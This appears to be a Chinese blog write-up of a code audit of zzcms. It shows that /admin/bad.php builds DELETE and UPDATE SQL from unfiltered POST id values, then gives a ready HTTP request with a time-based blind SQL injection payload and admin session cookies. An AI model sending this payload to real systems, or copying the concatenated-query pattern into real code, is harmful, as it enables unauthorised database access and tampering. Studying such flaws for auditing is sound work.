本文探讨了zzcms系统在/admin/bad.php文件中存在的一处SQL注入漏洞。当action参数值为'del'时,SQL语句未经任何过滤直接执行,揭示了系统在数据库操作上的安全缺陷。
没有代码基础的同学可以看下:【零基础】php代码审计之sql注入_小韩韩啊的博客-优快云博客_php代码审计sql注入
漏洞文件:
/admin/bad.php
<?php include("admin.php");?>
...
#line 10-41
checkadminisdo("badusermessage");
$action=isset($_REQUEST["action"])?$_REQUEST["action"]:'';
if ($action<>""){
$id="";
if(!empty($_POST['id'])){
for($i=0; $i<count($_POST['id']);$i++){
$id=$id.($_POST['id'][$i].',');
}
$id=substr($id,0,strlen($id)-1);//去除最后面的","
}
if ($id==""){
echo "<script>alert('操作失败!至少要选中一条信息。');history.back();</script>";
}
}
if ($action=="del"){
if (strpos($id,",")>0){
$sql="delete from zzcms_bad where id in (". $id .")";
}else{
$sql="delete from zzcms_bad where id='$id'";
}
query($sql);
echo "<script>location.href='bad.php'</script>";
}
if ($action=="lockip"){
if (strpos($id,",")>0){
$sql="update zzcms_bad set lockip=1 where id in (". $id .")";
}else{
$sql="update zzcms_bad set lockip=1 where id='$id'";
}
query($sql);可以很明显看到:
action=="del" 下面应用sql语句不存在任何过滤,
被直接带入到了query中执行。
POST /admin/bad.php HTTP/1.1
Host: your host
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://zzcms.com
Connection: close
Referer: http://zzcms.com/admin/bad.php
Cookie: askbigclassid=0; asksmallclassid=0; __tins__713776=%7B%22sid%22%3A%201629992898141%2C%20%22vd%22%3A%206%2C%20%22expires%22%3A%201629995107025%7D; __51cke__=; __51laig__=20; bdshare_firstime=1629951198125; PHPSESSID=a5tlfr6q1ete0aaa6dq5pppi43; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
Upgrade-Insecure-Requests: 1
action=del&id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(9)))a)
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
